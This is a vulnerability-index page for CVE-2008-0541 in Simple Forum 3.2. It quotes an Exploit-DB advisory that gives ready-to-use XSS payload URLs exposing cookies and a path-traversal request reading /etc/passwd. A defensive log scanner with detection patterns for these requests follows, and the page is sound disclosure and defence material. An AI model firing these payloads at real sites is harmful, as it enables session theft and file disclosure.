CVE-2008-0541
Published 2008-02-01
CVE-2008-0541: Multiple cross-site scripting (XSS) vulnerabilities in forum.php in Gerd Tentler Simple Forum 3.2 allow remote attackers to inject arbitrary web script or HTML…
Priority P4 · 17 · medium · 4.3 · CVSS 2.0
AV:N/AC:M/Au:N/C:N/I:P/A:N
EXPLOIT
EPSS: 1.44% (70.0th percentile)
Multiple cross-site scripting (XSS) vulnerabilities in forum.php in Gerd Tentler Simple Forum 3.2 allow remote attackers to inject arbitrary web script or HTML via the (1) open and (2) date_show parameters.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| gerd_tentler | simple_forum | — | — |
No detection rules found.
Exploit-DB
Microsoft Windows MSHTML Engine - 'Edit' Remote Code Execution
exploitdb·2019-03-13·CVSS 8.8
CVE-2019-0541 [HIGH] Microsoft Windows MSHTML Engine - 'Edit' Remote Code Execution
Microsoft Windows MSHTML Engine - 'Edit' Remote Code Execution
---
# Exploit Title: Microsoft Windows (CVE-2019-0541) MSHTML Engine "Edit" Remote Code Execution Vulnerability
# Google Dork: N/A
# Date: March, 13 2019
# Exploit Author: Eduardo Braun Prado
# Vendor Homepage: http://www.microsoft.com/
# Software Link: http://www.microsoft.com/
# Version: Windows 7 SP1, Server 2008, Server 2012, Server 2012 R2, 8.0, 8.1, 10 (any) with full patches up to December 2018. both x86 and x64 architectures.
# Tested on: Windows 7 SP1, Server 2008, Server 2012, Server 2012 R2, 8.0, 8.1, 10 (any) with full patches up to December 2018. both x86 and x64 architectures.
# CVE : CVE-2019-0541
The Microsoft Windows MSHTML Engine is prone to a vulnerability that allows attackers to execute arbitrar
Exploit-DB
Simple Forum 3.2 - File Disclosure / Cross-Site Scripting
exploitdb·2008-01-26
CVE-2008-0542 Simple Forum 3.2 - File Disclosure / Cross-Site Scripting
Simple Forum 3.2 - File Disclosure / Cross-Site Scripting
---
########################################################
# #
# SIMPLE FORUM v 3.2 MULTIPLE VULNERABILITIES #
# author : tomplixsee #
# my email : [email protected] #
# #
# software : SIMPLE FORUM v3.2 #
# download : http://www.gerd-tentler.de/tools/forum/#
# #
########################################################
1.XSS
vulnerable code on forum.php
">
">
.....
example:
http://target/path/forum.php?open="/>alert(document.cookie)
http://target/path/forum.php?date_show="/>alert(document.cookie)
2.Remote File Disclosure
vulnerable code on thumbnail.php
example:
http://target/path/thumbnail.php?type=3&file=../../../../../../../etc/passwd
then try to view the page source :D
salam tuk:
ira, sukabirus network communit
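A defender-side check for the two request patterns the advisory above describes, as an added example that is not part of the original post or of this index page. It assumes a combined-format web access log and that legitimate `open`, `date_show` and `file` values never contain markup characters or `..` path segments; the log lines are constructed samples.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

XSS_PARAMS = {"open", "date_show"}   # forum.php parameters named in CVE-2008-0541
PATH_PARAMS = {"file"}               # thumbnail.php parameter shown in the advisory
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
MARKUP_RE = re.compile("[<>\"']")    # assumption: never valid in these parameters
TRAVERSAL_RE = re.compile(r'(?:^|[\\/])\.\.(?:[\\/]|$)')  # ".." as a path segment

# Constructed sample log lines (documentation addresses, benign markup).
SAMPLE_LOG = [
    '203.0.113.7 - - [01/Feb/2008:10:00:00 +0000] "GET /f/forum.php?open=12 HTTP/1.1" 200 5120',
    '203.0.113.7 - - [01/Feb/2008:10:00:02 +0000] "GET /f/forum.php?open=%22%2F%3E%3Cb%3E HTTP/1.1" 200 5130',
    '203.0.113.7 - - [01/Feb/2008:10:00:03 +0000] "GET /f/forum.php?date_show=%2522%253E HTTP/1.1" 200 5127',
    '198.51.100.9 - - [01/Feb/2008:10:01:00 +0000] "GET /f/thumbnail.php?type=3&file=..%2F..%2Fetc%2Fpasswd HTTP/1.1" 200 1432',
    '198.51.100.9 - - [01/Feb/2008:10:01:05 +0000] "GET /f/thumbnail.php?type=3&file=img/photo..1.jpg HTTP/1.1" 200 20480',
]

def decode_fully(value, rounds=3):
    """Undo repeated percent-encoding (e.g. %253E -> %3E -> >)."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def classify(log_line):
    """Return a list of (finding, parameter) tuples for one access-log line."""
    match = REQUEST_RE.search(log_line)
    if not match:
        return []
    url = urlsplit(match.group(1))
    script = url.path.rsplit("/", 1)[-1].lower()
    findings = []
    for name, values in parse_qs(url.query, keep_blank_values=True).items():
        for raw in values:
            value = decode_fully(raw)  # parse_qs already decoded once
            if script == "forum.php" and name in XSS_PARAMS and MARKUP_RE.search(value):
                findings.append(("xss-probe", name))
            if script == "thumbnail.php" and name in PATH_PARAMS and TRAVERSAL_RE.search(value):
                findings.append(("path-traversal", name))
    return findings

def scan(lines):
    """Return (line_number, findings) for every line with at least one finding."""
    return [(n, f) for n, f in ((i, classify(l)) for i, l in enumerate(lines, 1)) if f]

if __name__ == "__main__":
    for number, findings in scan(SAMPLE_LOG):
        print(number, findings)
```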
No writeups or analysis indexed.
http://secunia.com/advisories/28681
http://www.securityfocus.com/bid/27463
https://exchange.xforce.ibmcloud.com/vulnerabilities/39978
https://www.exploit-db.com/exploits/4989
Published: 2008-02-01